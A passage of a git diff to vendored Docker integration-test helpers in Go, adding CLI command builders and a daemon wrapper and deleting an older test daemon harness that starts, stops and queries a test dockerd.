+func WithContextPath(path string) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Command = append(cmd.Command, path)
+		return nil
+	}
+}
+
+// WithExternalBuildContext use the specified context as build context
+func WithExternalBuildContext(ctx *fakecontext.Fake) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Dir = ctx.Dir
+		cmd.Command = append(cmd.Command, ".")
+		return nil
+	}
+}
+
+// WithBuildContext sets up the build context
+func WithBuildContext(t testingT, contextOperators ...func(*fakecontext.Fake) error) func(*icmd.Cmd) func() {
+	// FIXME(vdemeester) de-duplicate that
+	ctx := fakecontext.New(t, "", contextOperators...)
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Dir = ctx.Dir
+		cmd.Command = append(cmd.Command, ".")
+		return closeBuildContext(t, ctx)
+	}
+}
+
+// WithFile adds the specified file (with content) in the build context
+func WithFile(name, content string) func(*fakecontext.Fake) error {
+	return fakecontext.WithFile(name, content)
+}
+
+func closeBuildContext(t testingT, ctx *fakecontext.Fake) func() {
+	return func() {
+		if err := ctx.Close(); err != nil {
+			t.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/cli/cli.go b/vendor/github.com/docker/docker/integration-cli/cli/cli.go
new file mode 100644
index 0000000000..bc3f3c194e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/cli/cli.go
@@ -0,0 +1,226 @@
+package cli // import "github.com/docker/docker/integration-cli/cli"
+
+import (
+	"fmt"
+	"io"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/integration-cli/daemon"
+	"github.com/docker/docker/integration-cli/environment"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+	"gotest.tools/icmd"
+)
+
+var testEnv *environment.Execution
+
+// SetTestEnvironment sets a static test environment
+// TODO: decouple this package from environment
+func SetTestEnvironment(env *environment.Execution) {
+	testEnv = env
+}
+
+// CmdOperator defines functions that can modify a command
+type CmdOperator func(*icmd.Cmd) func()
+
+type testingT interface {
+	assert.TestingT
+	Fatal(args ...interface{})
+	Fatalf(string, ...interface{})
+}
+
+// DockerCmd executes the specified docker command and expect a success
+func DockerCmd(t testingT, args ...string) *icmd.Result {
+	return Docker(Args(args...)).Assert(t, icmd.Success)
+}
+
+// BuildCmd executes the specified docker build command and expect a success
+func BuildCmd(t testingT, name string, cmdOperators ...CmdOperator) *icmd.Result {
+	return Docker(Build(name), cmdOperators...).Assert(t, icmd.Success)
+}
+
+// InspectCmd executes the specified docker inspect command and expect a success
+func InspectCmd(t testingT, name string, cmdOperators ...CmdOperator) *icmd.Result {
+	return Docker(Inspect(name), cmdOperators...).Assert(t, icmd.Success)
+}
+
+// WaitRun will wait for the specified container to be running, maximum 5 seconds.
+func WaitRun(t testingT, name string, cmdOperators ...CmdOperator) {
+	WaitForInspectResult(t, name, "{{.State.Running}}", "true", 5*time.Second, cmdOperators...)
+}
+
+// WaitExited will wait for the specified container to state exit, subject
+// to a maximum time limit in seconds supplied by the caller
+func WaitExited(t testingT, name string, timeout time.Duration, cmdOperators ...CmdOperator) {
+	WaitForInspectResult(t, name, "{{.State.Status}}", "exited", timeout, cmdOperators...)
+}
+
+// WaitRestart will wait for the specified container to restart once
+func WaitRestart(t testingT, name string, timeout time.Duration, cmdOperators ...CmdOperator) {
+	WaitForInspectResult(t, name, "{{.RestartCount}}", "1", timeout, cmdOperators...)
+}
+
+// WaitForInspectResult waits for the specified expression to be equals to the specified expected string in the given time.
+func WaitForInspectResult(t testingT, name, expr, expected string, timeout time.Duration, cmdOperators ...CmdOperator) {
+	after := time.After(timeout)
+
+	args := []string{"inspect", "-f", expr, name}
+	for {
+		result := Docker(Args(args...), cmdOperators...)
+		if result.Error != nil {
+			if !strings.Contains(strings.ToLower(result.Stderr()), "no such") {
+				t.Fatalf("error executing docker inspect: %v\n%s",
+					result.Stderr(), result.Stdout())
+			}
+			select {
+			case <-after:
+				t.Fatal(result.Error)
+			default:
+				time.Sleep(10 * time.Millisecond)
+				continue
+			}
+		}
+
+		out := strings.TrimSpace(result.Stdout())
+		if out == expected {
+			break
+		}
+
+		select {
+		case <-after:
+			t.Fatalf("condition \"%q == %q\" not true in time (%v)", out, expected, timeout)
+		default:
+		}
+
+		time.Sleep(100 * time.Millisecond)
+	}
+}
+
+// Docker executes the specified docker command
+func Docker(cmd icmd.Cmd, cmdOperators ...CmdOperator) *icmd.Result {
+	for _, op := range cmdOperators {
+		deferFn := op(&cmd)
+		if deferFn != nil {
+			defer deferFn()
+		}
+	}
+	appendDocker(&cmd)
+	if err := validateArgs(cmd.Command...); err != nil {
+		return &icmd.Result{
+			Error: err,
+		}
+	}
+	return icmd.RunCmd(cmd)
+}
+
+// validateArgs is a checker to ensure tests are not running commands which are
+// not supported on platforms. Specifically on Windows this is 'busybox top'.
+func validateArgs(args ...string) error {
+	if testEnv.OSType != "windows" {
+		return nil
+	}
+	foundBusybox := -1
+	for key, value := range args {
+		if strings.ToLower(value) == "busybox" {
+			foundBusybox = key
+		}
+		if (foundBusybox != -1) && (key == foundBusybox+1) && (strings.ToLower(value) == "top") {
+			return errors.New("cannot use 'busybox top' in tests on Windows. Use runSleepingContainer()")
+		}
+	}
+	return nil
+}
+
+// Build executes the specified docker build command
+func Build(name string) icmd.Cmd {
+	return icmd.Command("build", "-t", name)
+}
+
+// Inspect executes the specified docker inspect command
+func Inspect(name string) icmd.Cmd {
+	return icmd.Command("inspect", name)
+}
+
+// Format sets the specified format with --format flag
+func Format(format string) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Command = append(
+			[]string{cmd.Command[0]},
+			append([]string{"--format", fmt.Sprintf("{{%s}}", format)}, cmd.Command[1:]...)...,
+		)
+		return nil
+	}
+}
+
+func appendDocker(cmd *icmd.Cmd) {
+	cmd.Command = append([]string{testEnv.DockerBinary()}, cmd.Command...)
+}
+
+// Args build an icmd.Cmd struct from the specified arguments
+func Args(args ...string) icmd.Cmd {
+	switch len(args) {
+	case 0:
+		return icmd.Cmd{}
+	case 1:
+		return icmd.Command(args[0])
+	default:
+		return icmd.Command(args[0], args[1:]...)
+	}
+}
+
+// Daemon points to the specified daemon
+func Daemon(d *daemon.Daemon) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Command = append([]string{"--host", d.Sock()}, cmd.Command...)
+		return nil
+	}
+}
+
+// WithTimeout sets the timeout for the command to run
+func WithTimeout(timeout time.Duration) func(cmd *icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Timeout = timeout
+		return nil
+	}
+}
+
+// WithEnvironmentVariables sets the specified environment variables for the command to run
+func WithEnvironmentVariables(envs ...string) func(cmd *icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Env = envs
+		return nil
+	}
+}
+
+// WithFlags sets the specified flags for the command to run
+func WithFlags(flags ...string) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Command = append(cmd.Command, flags...)
+		return nil
+	}
+}
+
+// InDir sets the folder in which the command should be executed
+func InDir(path string) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Dir = path
+		return nil
+	}
+}
+
+// WithStdout sets the standard output writer of the command
+func WithStdout(writer io.Writer) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Stdout = writer
+		return nil
+	}
+}
+
+// WithStdin sets the standard input reader for the command
+func WithStdin(stdin io.Reader) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Stdin = stdin
+		return nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon.go b/vendor/github.com/docker/docker/integration-cli/daemon.go
deleted file mode 100644
index 9fd3f1e82d..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/daemon.go
+++ /dev/null
@@ -1,608 +0,0 @@
-package main
-
-import (
-	"bytes"
-	"encoding/json"
-	"errors"
-	"fmt"
-	"io"
-	"net/http"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"strconv"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/api/types/events"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/go-connections/sockets"
-	"github.com/docker/go-connections/tlsconfig"
-	"github.com/go-check/check"
-)
-
-var daemonSockRoot = filepath.Join(os.TempDir(), "docker-integration")
-
-// Daemon represents a Docker daemon for the testing framework.
-type Daemon struct {
-	GlobalFlags []string
-
-	id                string
-	c                 *check.C
-	logFile           *os.File
-	folder            string
-	root              string
-	stdin             io.WriteCloser
-	stdout, stderr    io.ReadCloser
-	cmd               *exec.Cmd
-	storageDriver     string
-	wait              chan error
-	userlandProxy     bool
-	useDefaultHost    bool
-	useDefaultTLSHost bool
-	execRoot          string
-}
-
-type clientConfig struct {
-	transport *http.Transport
-	scheme    string
-	addr      string
-}
-
-// NewDaemon returns a Daemon instance to be used for testing.
-// This will create a directory such as d123456789 in the folder specified by $DEST.
-// The daemon will not automatically start.
-func NewDaemon(c *check.C) *Daemon {
-	dest := os.Getenv("DEST")
-	c.Assert(dest, check.Not(check.Equals), "", check.Commentf("Please set the DEST environment variable"))
-
-	err := os.MkdirAll(daemonSockRoot, 0700)
-	c.Assert(err, checker.IsNil, check.Commentf("could not create daemon socket root"))
-
-	id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID()))
-	dir := filepath.Join(dest, id)
-	daemonFolder, err := filepath.Abs(dir)
-	c.Assert(err, check.IsNil, check.Commentf("Could not make %q an absolute path", dir))
-	daemonRoot := filepath.Join(daemonFolder, "root")
-
-	c.Assert(os.MkdirAll(daemonRoot, 0755), check.IsNil, check.Commentf("Could not create daemon root %q", dir))
-
-	userlandProxy := true
-	if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" {
-		if val, err := strconv.ParseBool(env); err != nil {
-			userlandProxy = val
-		}
-	}
-
-	return &Daemon{
-		id:            id,
-		c:             c,
-		folder:        daemonFolder,
-		root:          daemonRoot,
-		storageDriver: os.Getenv("DOCKER_GRAPHDRIVER"),
-		userlandProxy: userlandProxy,
-		execRoot:      filepath.Join(os.TempDir(), "docker-execroot", id),
-	}
-}
-
-// RootDir returns the root directory of the daemon.
-func (d *Daemon) RootDir() string {
-	return d.root
-}
-
-func (d *Daemon) getClientConfig() (*clientConfig, error) {
-	var (
-		transport *http.Transport
-		scheme    string
-		addr      string
-		proto     string
-	)
-	if d.useDefaultTLSHost {
-		option := &tlsconfig.Options{
-			CAFile:   "fixtures/https/ca.pem",
-			CertFile: "fixtures/https/client-cert.pem",
-			KeyFile:  "fixtures/https/client-key.pem",
-		}
-		tlsConfig, err := tlsconfig.Client(*option)
-		if err != nil {
-			return nil, err
-		}
-		transport = &http.Transport{
-			TLSClientConfig: tlsConfig,
-		}
-		addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort)
-		scheme = "https"
-		proto = "tcp"
-	} else if d.useDefaultHost {
-		addr = opts.DefaultUnixSocket
-		proto = "unix"
-		scheme = "http"
-		transport = &http.Transport{}
-	} else {
-		addr = d.sockPath()
-		proto = "unix"
-		scheme = "http"
-		transport = &http.Transport{}
-	}
-
-	d.c.Assert(sockets.ConfigureTransport(transport, proto, addr), check.IsNil)
-
-	return &clientConfig{
-		transport: transport,
-		scheme:    scheme,
-		addr:      addr,
-	}, nil
-}
-
-// Start will start the daemon and return once it is ready to receive requests.
-// You can specify additional daemon flags.
-func (d *Daemon) Start(args ...string) error {
-	logFile, err := os.OpenFile(filepath.Join(d.folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600)
-	d.c.Assert(err, check.IsNil, check.Commentf("[%s] Could not create %s/docker.log", d.id, d.folder))
-
-	return d.StartWithLogFile(logFile, args...)
-}
-
-// StartWithLogFile will start the daemon and attach its streams to a given file.
-func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error {
-	dockerdBinary, err := exec.LookPath(dockerdBinary)
-	d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not find docker binary in $PATH", d.id))
-
-	args := append(d.GlobalFlags,
-		"--containerd", "/var/run/docker/libcontainerd/docker-containerd.sock",
-		"--graph", d.root,
-		"--exec-root", d.execRoot,
-		"--pidfile", fmt.Sprintf("%s/docker.pid", d.folder),
-		fmt.Sprintf("--userland-proxy=%t", d.userlandProxy),
-	)
-	if experimentalDaemon {
-		args = append(args, "--experimental", "--init")
-	}
-	if !(d.useDefaultHost || d.useDefaultTLSHost) {
-		args = append(args, []string{"--host", d.sock()}...)
-	}
-	if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
-		args = append(args, []string{"--userns-remap", root}...)
-	}
-
-	// If we don't explicitly set the log-level or debug flag(-D) then
-	// turn on debug mode
-	foundLog := false
-	foundSd := false
-	for _, a := range providedArgs {
-		if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") {
-			foundLog = true
-		}
-		if strings.Contains(a, "--storage-driver") {
-			foundSd = true
-		}
-	}
-	if !foundLog {
-		args = append(args, "--debug")
-	}
-	if d.storageDriver != "" && !foundSd {
-		args = append(args, "--storage-driver", d.storageDriver)
-	}
-
-	args = append(args, providedArgs...)
-	d.cmd = exec.Command(dockerdBinary, args...)
-	d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1")
-	d.cmd.Stdout = out
-	d.cmd.Stderr = out
-	d.logFile = out
-
-	if err := d.cmd.Start(); err != nil {
-		return fmt.Errorf("[%s] could not start daemon container: %v", d.id, err)
-	}
-
-	wait := make(chan error)
-
-	go func() {
-		wait <- d.cmd.Wait()
-		d.c.Logf("[%s] exiting daemon", d.id)
-		close(wait)
-	}()
-
-	d.wait = wait
-
-	tick := time.Tick(500 * time.Millisecond)
-	// make sure daemon is ready to receive requests
-	startTime := time.Now().Unix()
-	for {
-		d.c.Logf("[%s] waiting for daemon to start", d.id)
-		if time.Now().Unix()-startTime > 5 {
-			// After 5 seconds, give up
-			return fmt.Errorf("[%s] Daemon exited and never started", d.id)
-		}
-		select {
-		case <-time.After(2 * time.Second):
-			return fmt.Errorf("[%s] timeout: daemon does not respond", d.id)
-		case <-tick:
-			clientConfig, err := d.getClientConfig()
-			if err != nil {
-				return err
-			}
-
-			client := &http.Client{
-				Transport: clientConfig.transport,
-			}
-
-			req, err := http.NewRequest("GET", "/_ping", nil)
-			d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not create new request", d.id))
-			req.URL.Host = clientConfig.addr
-			req.URL.Scheme = clientConfig.scheme
-			resp, err := client.Do(req)
-			if err != nil {
-				continue
-			}
-			if resp.StatusCode != http.StatusOK {
-				d.c.Logf("[%s] received status != 200 OK: %s", d.id, resp.Status)
-			}
-			d.c.Logf("[%s] daemon started", d.id)
-			d.root, err = d.queryRootDir()
-			if err != nil {
-				return fmt.Errorf("[%s] error querying daemon for root directory: %v", d.id, err)
-			}
-			return nil
-		case <-d.wait:
-			return fmt.Errorf("[%s] Daemon exited during startup", d.id)
-		}
-	}
-}
-
-// StartWithBusybox will first start the daemon with Daemon.Start()
-// then save the busybox image from the main daemon and load it into this Daemon instance.
-func (d *Daemon) StartWithBusybox(arg ...string) error {
-	if err := d.Start(arg...); err != nil {
-		return err
-	}
-	return d.LoadBusybox()
-}
-
-// Kill will send a SIGKILL to the daemon
-func (d *Daemon) Kill() error {
-	if d.cmd == nil || d.wait == nil {
-		return errors.New("daemon not started")
-	}
-
-	defer func() {
-		d.logFile.Close()
-		d.cmd = nil
-	}()
-
-	if err := d.cmd.Process.Kill(); err != nil {
-		d.c.Logf("Could not kill daemon: %v", err)
-		return err
-	}
-
-	if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil {
-		return err
-	}
-
-	return nil
-}
-
-// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its
-// stack to its log file and exit
-// This is used primarily for gathering debug information on test timeout
-func (d *Daemon) DumpStackAndQuit() {
-	if d.cmd == nil || d.cmd.Process == nil {
-		return
-	}
-	signalDaemonDump(d.cmd.Process.Pid)
-}
-
-// Stop will send a SIGINT every second and wait for the daemon to stop.
-// If it timeouts, a SIGKILL is sent.
-// Stop will not delete the daemon directory. If a purged daemon is needed,
-// instantiate a new one with NewDaemon.
-func (d *Daemon) Stop() error {
-	if d.cmd == nil || d.wait == nil {
-		return errors.New("daemon not started")
-	}
-
-	defer func() {
-		d.logFile.Close()
-		d.cmd = nil
-	}()
-
-	i := 1
-	tick := time.Tick(time.Second)
-
-	if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
-		return fmt.Errorf("could not send signal: %v", err)
-	}
-out1:
-	for {
-		select {
-		case err := <-d.wait:
-			return err
-		case <-time.After(20 * time.Second):
-			// time for stopping jobs and run onShutdown hooks
-			d.c.Logf("timeout: %v", d.id)
-			break out1
-		}
-	}
-
-out2:
-	for {
-		select {
-		case err := <-d.wait:
-			return err
-		case <-tick:
-			i++
-			if i > 5 {
-				d.c.Logf("tried to interrupt daemon for %d times, now try to kill it", i)
-				break out2
-			}
-			d.c.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid)
-			if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
-				return fmt.Errorf("could not send signal: %v", err)
-			}
-		}
-	}
-
-	if err := d.cmd.Process.Kill(); err != nil {
-		d.c.Logf("Could not kill daemon: %v", err)
-		return err
-	}
-
-	if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil {
-		return err
-	}
-
-	return nil
-}
-
-// Restart will restart the daemon by first stopping it and then starting it.
-func (d *Daemon) Restart(arg ...string) error {
-	d.Stop()
-	// in the case of tests running a user namespace-enabled daemon, we have resolved
-	// d.root to be the actual final path of the graph dir after the "uid.gid" of
-	// remapped root is added--we need to subtract it from the path before calling
-	// start or else we will continue making subdirectories rather than truly restarting
-	// with the same location/root:
-	if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
-		d.root = filepath.Dir(d.root)
-	}
-	return d.Start(arg...)
-}
-
-// LoadBusybox will load the stored busybox into a newly started daemon
-func (d *Daemon) LoadBusybox() error {
-	bb := filepath.Join(d.folder, "busybox.tar")
-	if _, err := os.Stat(bb); err != nil {
-		if !os.IsNotExist(err) {
-			return fmt.Errorf("unexpected error on busybox.tar stat: %v", err)
-		}
-		// saving busybox image from main daemon
-		if out, err := exec.Command(dockerBinary, "save", "--output", bb, "busybox:latest").CombinedOutput(); err != nil {
-			imagesOut, _ := exec.Command(dockerBinary, "images", "--format", "{{ .Repository }}:{{ .Tag }}").CombinedOutput()
-			return fmt.Errorf("could not save busybox image: %s\n%s", string(out), strings.TrimSpace(string(imagesOut)))
-		}
-	}
-	// loading busybox image to this daemon
-	if out, err := d.Cmd("load", "--input", bb); err != nil {
-		return fmt.Errorf("could not load busybox image: %s", out)
-	}
-	if err := os.Remove(bb); err != nil {
-		d.c.Logf("could not remove %s: %v", bb, err)
-	}
-	return nil
-}
-
-func (d *Daemon) queryRootDir() (string, error) {
-	// update daemon root by asking /info endpoint (to support user
-	// namespaced daemon with root remapped uid.gid directory)
-	clientConfig, err := d.getClientConfig()
-	if err != nil {
-		return "", err
-	}
-
-	client := &http.Client{
-		Transport: clientConfig.transport,
-	}
-
-	req, err := http.NewRequest("GET", "/info", nil)
-	if err != nil {
-		return "", err
-	}
-	req.Header.Set("Content-Type", "application/json")
-	req.URL.Host = clientConfig.addr
-	req.URL.Scheme = clientConfig.scheme
-
-	resp, err := client.Do(req)
-	if err != nil {
-		return "", err
-	}
-	body := ioutils.NewReadCloserWrapper(resp.Body, func() error {
-		return resp.Body.Close()
-	})
-
-	type Info struct {
-		DockerRootDir string
-	}
-	var b []byte
-	var i Info
-	b, err = readBody(body)
-	if err == nil && resp.StatusCode == http.StatusOK {
-		// read the docker root dir
-		if err = json.Unmarshal(b, &i); err == nil {
-			return i.DockerRootDir, nil
-		}
-	}
-	return "", err
-}
-
-func (d *Daemon) sock() string {
-	return fmt.Sprintf("unix://" + d.sockPath())
-}
-
-func (d *Daemon) sockPath() string {
-	return filepath.Join(daemonSockRoot, d.id+".sock")
-}
-
-func (d *Daemon) waitRun(contID string) error {
-	args := []string{"--host", d.sock()}
-	return waitInspectWithArgs(contID, "{{.State.Running}}", "true", 10*time.Second, args...)
-}
-
-func (d *Daemon) getBaseDeviceSize(c *check.C) int64 {
-	infoCmdOutput, _, err := runCommandPipelineWithOutput(
-		exec.Command(dockerBinary, "-H", d.sock(), "info"),
-		exec.Command("grep", "Base Device Size"),
-	)
-	c.Assert(err, checker.IsNil)
-	basesizeSlice := strings.Split(infoCmdOutput, ":")
-	basesize := strings.Trim(basesizeSlice[1], " ")
-	basesize = strings.Trim(basesize, "\n")[:len(basesize)-3]
-	basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64)
-	c.Assert(err, checker.IsNil)
-	basesizeBytes := int64(basesizeFloat) * (1024 * 1024 * 1024)
-	return basesizeBytes
-}
-
-// Cmd will execute a docker CLI command against this Daemon.
-// Example: d.Cmd("version") will run docker -H unix://path/to/unix.sock version
-func (d *Daemon) Cmd(args ...string) (string, error) {
-	b, err := d.command(args...).CombinedOutput()
-	return string(b), err
-}
-
-func (d *Daemon) command(args ...string) *exec.Cmd {
-	return exec.Command(dockerBinary, d.prependHostArg(args)...)
-}
-
-func (d *Daemon) prependHostArg(args []string) []string {
-	for _, arg := range args {
-		if arg == "--host" || arg == "-H" {
-			return args
-		}
-	}
-	return append([]string{"--host", d.sock()}, args...)
-}
-
-// SockRequest executes a socket request on a daemon and returns statuscode and output.
-func (d *Daemon) SockRequest(method, endpoint string, data interface{}) (int, []byte, error) {
-	jsonData := bytes.NewBuffer(nil)
-	if err := json.NewEncoder(jsonData).Encode(data); err != nil {
-		return -1, nil, err
-	}
-
-	res, body, err := d.SockRequestRaw(method, endpoint, jsonData, "application/json")
-	if err != nil {
-		return -1, nil, err
-	}
-	b, err := readBody(body)
-	return res.StatusCode, b, err
-}
-
-// SockRequestRaw executes a socket request on a daemon and returns an http
-// response and a reader for the output data.
-func (d *Daemon) SockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) {
-	return sockRequestRawToDaemon(method, endpoint, data, ct, d.sock())
-}
-
-// LogFileName returns the path the the daemon's log file
-func (d *Daemon) LogFileName() string {
-	return d.logFile.Name()
-}
-
-func (d *Daemon) getIDByName(name string) (string, error) {
-	return d.inspectFieldWithError(name, "Id")
-}
-
-func (d *Daemon) activeContainers() (ids []string) {
-	out, _ := d.Cmd("ps", "-q")
-	for _, id := range strings.Split(out, "\n") {
-		if id = strings.TrimSpace(id); id != "" {
-			ids = append(ids, id)
-		}
-	}
-	return
-}
-
-func (d *Daemon) inspectFilter(name, filter string) (string, error) {
-	format := fmt.Sprintf("{{%s}}", filter)
-	out, err := d.Cmd("inspect", "-f", format, name)
-	if err != nil {
-		return "", fmt.Errorf("failed to inspect %s: %s", name, out)
-	}
-	return strings.TrimSpace(out), nil
-}
-
-func (d *Daemon) inspectFieldWithError(name, field string) (string, error) {
-	return d.inspectFilter(name, fmt.Sprintf(".%s", field))
-}
-
-func (d *Daemon) findContainerIP(id string) string {
-	out, err := d.Cmd("inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.bridge.IPAddress }}'"), id)
-	if err != nil {
-		d.c.Log(err)
-	}
-	return strings.Trim(out, " \r\n'")
-}
-
-func (d *Daemon) buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, int, error) {
-	buildCmd := buildImageCmdWithHost(name, dockerfile, d.sock(), useCache, buildFlags...)
-	return runCommandWithOutput(buildCmd)
-}
-
-func (d *Daemon) checkActiveContainerCount(c *check.C) (interface{}, check.CommentInterface) {
-	out, err := d.Cmd("ps", "-q")
-	c.Assert(err, checker.IsNil)
-	if len(strings.TrimSpace(out)) == 0 {
-		return 0, nil
-	}
-	return len(strings.Split(strings.TrimSpace(out), "\n")), check.Commentf("output: %q", string(out))
-}
-
-func (d *Daemon) reloadConfig() error {
-	if d.cmd == nil || d.cmd.Process == nil {
-		return fmt.Errorf("daemon is not running")
-	}
-
-	errCh := make(chan error)
-	started := make(chan struct{})
-	go func() {
-		_, body, err := sockRequestRawToDaemon("GET", "/events", nil, "", d.sock())
-		close(started)
-		if err != nil {
-			errCh <- err
-		}
-		defer body.Close()
-		dec := json.NewDecoder(body)
-		for {
-			var e events.Message
-			if err := dec.Decode(&e); err != nil {
-				errCh <- err
-				return
-			}
-			if e.Type != events.DaemonEventType {
-				continue
-			}
-			if e.Action != "reload" {
-				continue
-			}
-			close(errCh) // notify that we are done
-			return
-		}
-	}()
-
-	<-started
-	if err := signalDaemonReload(d.cmd.Process.Pid); err != nil {
-		return fmt.Errorf("error signaling daemon reload: %v", err)
-	}
-	select {
-	case err := <-errCh:
-		if err != nil {
-			return fmt.Errorf("error waiting for daemon reload event: %v", err)
-		}
-	case <-time.After(30 * time.Second):
-		return fmt.Errorf("timeout waiting for daemon reload event")
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon/daemon.go b/vendor/github.com/docker/docker/integration-cli/daemon/daemon.go
new file mode 100644
index 0000000000..3d1fa38d5d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/daemon/daemon.go
@@ -0,0 +1,143 @@
+package daemon // import "github.com/docker/docker/integration-cli/daemon"
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/daemon"
+	"github.com/go-check/check"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+	"gotest.tools/icmd"
+)
+
+type testingT interface {
+	assert.TestingT
+	logT
+	Fatalf(string, ...interface{})
+}
+
+type logT interface {
+	Logf(string, ...interface{})
+}
+
+// Daemon represents a Docker daemon for the testing framework.
+type Daemon struct {
+	*daemon.Daemon
+	dockerBinary string
+}
+
+// New returns a Daemon instance to be used for testing.
+// This will create a directory such as d123456789 in the folder specified by $DOCKER_INTEGRATION_DAEMON_DEST or $DEST.
+// The daemon will not automatically start.
+func New(t testingT, dockerBinary string, dockerdBinary string, ops ...func(*daemon.Daemon)) *Daemon {
+	ops = append(ops, daemon.WithDockerdBinary(dockerdBinary))
+	d := daemon.New(t, ops...)
+	return &Daemon{
+		Daemon:       d,
+		dockerBinary: dockerBinary,
+	}
+}
+
+// Cmd executes a docker CLI command against this daemon.
+// Example: d.Cmd("version") will run docker -H unix://path/to/unix.sock version
+func (d *Daemon) Cmd(args ...string) (string, error) {
+	result := icmd.RunCmd(d.Command(args...))
+	return result.Combined(), result.Error
+}
+
+// Command creates a docker CLI command against this daemon, to be executed later.
+// Example: d.Command("version") creates a command to run "docker -H unix://path/to/unix.sock version"
+func (d *Daemon) Command(args ...string) icmd.Cmd {
+	return icmd.Command(d.dockerBinary, d.PrependHostArg(args)...)
+}
+
+// PrependHostArg prepend the specified arguments by the daemon host flags
+func (d *Daemon) PrependHostArg(args []string) []string {
+	for _, arg := range args {
+		if arg == "--host" || arg == "-H" {
+			return args
+		}
+	}
+	return append([]string{"--host", d.Sock()}, args...)
+}
+
+// GetIDByName returns the ID of an object (container, volume, …) given its name
+func (d *Daemon) GetIDByName(name string) (string, error) {
+	return d.inspectFieldWithError(name, "Id")
+}
+
+// InspectField returns the field filter by 'filter'
+func (d *Daemon) InspectField(name, filter string) (string, error) {
+	return d.inspectFilter(name, filter)
+}
+
+func (d *Daemon) inspectFilter(name, filter string) (string, error) {
+	format := fmt.Sprintf("{{%s}}", filter)
+	out, err := d.Cmd("inspect", "-f", format, name)
+	if err != nil {
+		return "", errors.Errorf("failed to inspect %s: %s", name, out)
+	}
+	return strings.TrimSpace(out), nil
+}
+
+func (d *Daemon) inspectFieldWithError(name, field string) (string, error) {
+	return d.inspectFilter(name, fmt.Sprintf(".%s", field))
+}
+
+// CheckActiveContainerCount returns the number of active containers
+// FIXME(vdemeester) should re-use ActivateContainers in some way
+func (d *Daemon) CheckActiveContainerCount(c *check.C) (interface{}, check.CommentInterface) {
+	out, err := d.Cmd("ps", "-q")
+	c.Assert(err, checker.IsNil)
+	if len(strings.TrimSpace(out)) == 0 {
+		return 0, nil
+	}
+	return len(strings.Split(strings.TrimSpace(out), "\n")), check.Commentf("output: %q", string(out))
+}
+
+// WaitRun waits for a container to be running for 10s
+func (d *Daemon) WaitRun(contID string) error {
+	args := []string{"--host", d.Sock()}
+	return WaitInspectWithArgs(d.dockerBinary, contID, "{{.State.Running}}", "true", 10*time.Second, args...)
+}
+
+// WaitInspectWithArgs waits for the specified expression to be equals to the specified expected string in the given time.
+// Deprecated: use cli.WaitCmd instead
+func WaitInspectWithArgs(dockerBinary, name, expr, expected string, timeout time.Duration, arg ...string) error {
+	after := time.After(timeout)
+
+	args := append(arg, "inspect", "-f", expr, name)
+	for {
+		result := icmd.RunCommand(dockerBinary, args...)
+		if result.Error != nil {
+			if !strings.Contains(strings.ToLower(result.Stderr()), "no such") {
+				return errors.Errorf("error executing docker inspect: %v\n%s",
+					result.Stderr(), result.Stdout())
+			}
+			select {
+			case <-after:
+				return result.Error
+			default:
+				time.Sleep(10 * time.Millisecond)
+				continue
+			}
+		}
+
+		out := strings.TrimSpace(result.Stdout())
+		if out == expected {
+			break
+		}
+
+		select {
+		case <-after:
+			return errors.Errorf("condition \"%q == %q\" not true in time (%v)", out, expected, timeout)
+		default:
+		}
+
